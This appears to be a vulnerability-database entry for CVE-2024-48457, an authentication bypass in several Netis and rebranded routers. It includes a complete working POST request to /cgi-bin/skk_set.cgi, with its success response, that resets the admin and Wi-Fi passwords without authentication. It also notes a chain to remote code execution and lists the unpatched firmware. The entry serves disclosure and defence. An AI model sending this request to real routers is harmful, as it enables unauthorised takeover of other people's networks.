Very High
CVE-2024-48457
Very High
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
Description
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/start_wifi.sh
Add Assessment
Technical Analysis
Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from an authentication bypass that allows for an unauthenticated reset of the Wifi and admin password of the router.
When router installed for the first time, you will be asked to set the initial router and Wifi password.
This POST request can be repeated anytime, hence resetting the router and Wifi password without any need for authentication.
Just modify the wpaPsk and password field with your base64 encode password to reset the router and Wifi password in the POST request below.
POST Request
POST /cgi-bin/skk_set.cgi HTTP/1.1 Host: 192.168.1.1 Content-Length: 251 Sec-Ch-Ua: "Not;A=Brand";v="24", "Chromium";v="128" Accept: text/plain, */*; q=0.01 Sec-Ch-Ua-Platform: "Linux" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://192.168.1.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.1/guide/welcome.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: keep-alive wl2g_idx=6&wl5g_idx=0&wlanMode=0&wl_idx=0&ssid2g=bmV0aXMtMDAwMDAw&ssid5g=bmV0aXMtMDAwMDAwLTVH&encrypt=4&wpaPsk=SWwwdmVoYWNraW5n&wpaPskType=2&wpaPskFormat=0&password=SWwwdmVoYWNraW5n&autoUpdate=0&firstSetup=1&quick_set=ap&app=wan_set_shortcut&wl_link=0
Response
HTTP/1.1 200 OK Date: Sun, 01 Jan 2023 00:04:13 GMT Server: Boa/0.94.14rc21 Connection: close ["SUCCESS"]
This CVE can be chained with CVE-2024-48455 and CVE-2024-48456 into an unauthenticated RCE.
A Metasploit module can be found here to exploit these routers.
Mitigation
There is no fix available.
The following router firmware versions are vulnerable:
- netis_MW5360_V1.0.1.3031_fw.bin
- Netis_MW5360-1.0.1.3442.bin
- Netis_MW5360_RUSSIA_844.bin
- netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
- netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
- netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
- netis_NC65_V3.0.0.3749.bin
- Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
- Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
- netis_NX10_V2.0.1.3582_fw.bin
- netis_NX10_V2.0.1.3643.bin
- Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
- netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
- Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
- GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
References
CVE-2024-48457
Metasploit Module PR 19770
Research Notes – Netis Router Exploit Chain Reactor
Credits
h00die-gr3y –> Discovery
CVSS V3 Severity and Metrics
General Information
Metasploit Modules
References
Miscellaneous
